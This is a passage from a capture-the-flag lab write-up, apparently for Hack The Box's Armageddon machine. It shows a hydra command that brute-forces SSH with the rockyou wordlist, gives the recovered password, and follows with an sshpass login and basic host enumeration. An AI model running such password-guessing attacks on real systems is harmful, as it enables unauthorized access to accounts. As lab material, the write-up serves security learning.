Brute-force Attack
There appears to be a single system user; brucetherealadmin
While continuing the other enumeration, I will get hydra going for the brucetherealadmin
user
┌──(kali㉿kali)-[~/archive/htb/labs/armageddon]
└─$ hydra -l brucetherealadmin -p /usr/share/wordlists/rockyou.txt ssh://$IP
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-04-03 20:44:38
[warning] many ssh configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[data] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[data] attacking ssh://10.10.10.233:22/
[status] 166.00 tries/min, 166 tries in 00:01h, 14344234 to do in 1440:12h, 15 active
[22][ssh] host: 10.10.10.233 login: brucetherealadmin password: booboo
I was able to brute-force the password for the brucetherealadmin
user against the target SSH service
┌──(kali㉿kali)-[~/archive/htb/labs/armageddon]
└─$ sshpass -p booboo ssh brucetherealadmin@$IP
last failed login: Mon Apr 3 19:46:20 BST 2023 from 10.10.14.2 on ssh:notty
There were 259 failed login attempts since the last successful login.
last login: Fri Mar 19 08:01:19 2021 from 10.10.14.5
[brucetherealadmin@armageddon ~]$ whoami
brucetherealadmin
[brucetherealadmin@armageddon ~]$ hostname
armageddon.htb
[brucetherealadmin@armageddon ~]$ ifconfig
ens192: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 10.10.10.233 netmask 255.255.255.0 broadcast 10.10.10.255
inet6 fe80::7648:5ea1:5371:b3b5 prefixlen 64 scopeid 0x20<link>
inet6 dead:beef::69d1:bb00:780c:f997 prefixlen 64 scopeid 0x0<global>
ether 00:50:56:b9:77:2d txqueuelen 1000 (Ethernet)
RX packets 825407 bytes 140654223 (134.1 MiB)
RX errors 0 dropped 24 overruns 0 frame 0
TX packets 819341 bytes 302343349 (288.3 MiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 1448 bytes 146156 (142.7 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 1448 bytes 146156 (142.7 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
This is very much unlikely in the real world application. But here I am.
Lateral Movement made to the brucetherealadmin
user